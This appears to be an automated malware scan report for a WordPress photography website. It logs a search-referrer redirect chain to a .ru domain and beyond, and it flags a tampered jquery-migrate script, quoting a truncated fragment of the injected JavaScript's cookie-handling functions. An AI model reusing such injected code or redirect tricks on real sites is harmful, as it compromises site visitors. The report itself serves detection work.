Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://epiclightphoto.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: epiclightphoto.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Sep 2014 12:16:26 GMT Location: http://ph21us.ru/ Server: Apache Content-Length: 293 Content-Type: text/html; charset=iso-8859-1 | malicious |
URL: http://ph21us.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: ph21us.ru Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Found Connection: close Date: Thu, 25 Sep 2014 12:16:26 GMT Location: http://doctorsfjxww.com Server: nginx/1.6.2 Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.3.3 | suspicious |
Scanned pages/files
Request | Server response | Status |
http://epiclightphoto.com/ | 200 OK Content-Length: 49072 Content-Type: text/html | clean |
http://epiclightphoto.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 97310 Content-Type: application/javascript | clean |
http://epiclightphoto.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8108 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function Depositormengarslife() {
function Expocarus(name, value, expires) {
    var date = new Date( new Date().getTime() + expires*1000 );
    document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function Afillatepost(name) {
    var afrodita = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
    return afrodita ? decodeURIComponent(afrodita[1]) : undefined;
}
var cookie =
Antivirus reports:
http://epiclightphoto.com/wp-content/plugins/dropdown-menu-widget/scripts/include.js?ver=3.9.2 | 200 OK Content-Length: 1294 Content-Type: application/javascript | clean |
https://maps.googleapis.com/maps/api/js?v=3&sensor=false&ver=1 | 200 OK Content-Length: 5089 Content-Type: text/javascript | clean |
http://epiclightphoto.com/wp-content/plugins/t2t-toolkit/js/modernizr.js?ver=2.1.10 | 200 OK Content-Length: 11156 Content-Type: application/javascript | clean |
http://epiclightphoto.com/wp-content/plugins/wp-spamshield/js/jscripts.php | 200 OK Content-Length: 883 Content-Type: application/x-javascript | clean |
http://epiclightphoto.com/wp-includes/js/hoverIntent.min.js?ver=r7 | 200 OK Content-Length: 2024 Content-Type: application/javascript | clean |
http://epiclightphoto.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20 | 200 OK Content-Length: 16156 Content-Type: application/javascript | clean |
http://epiclightphoto.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.9.2 | 200 OK Content-Length: 10566 Content-Type: application/javascript | clean |
http://epiclightphoto.com/wp-content/plugins/t2t-toolkit/js/_shared.js?ver=2.1.10 | 200 OK Content-Length: 65709 Content-Type: application/javascript | clean |
http://epiclightphoto.com/wp-content/plugins/t2t-toolkit/js/shortcodes.js?ver=2.1.10 | 200 OK Content-Length: 11107 Content-Type: application/javascript | clean |
http://epiclightphoto.com/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.10.4 | 200 OK Content-Length: 5197 Content-Type: application/javascript | clean |
http://epiclightphoto.com/wp-includes/js/jquery/ui/jquery.ui.effect.min.js?ver=1.10.4 | 200 OK Content-Length: 13880 Content-Type: application/javascript | clean |
http://epiclightphoto.com/wp-includes/js/jquery/ui/jquery.ui.effect-slide.min.js?ver=1.10.4 | 200 OK Content-Length: 1682 Content-Type: application/javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=epiclightphoto.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://epiclightphoto.com/
Result: epiclightphoto.com is not infected or malware details are not published yet.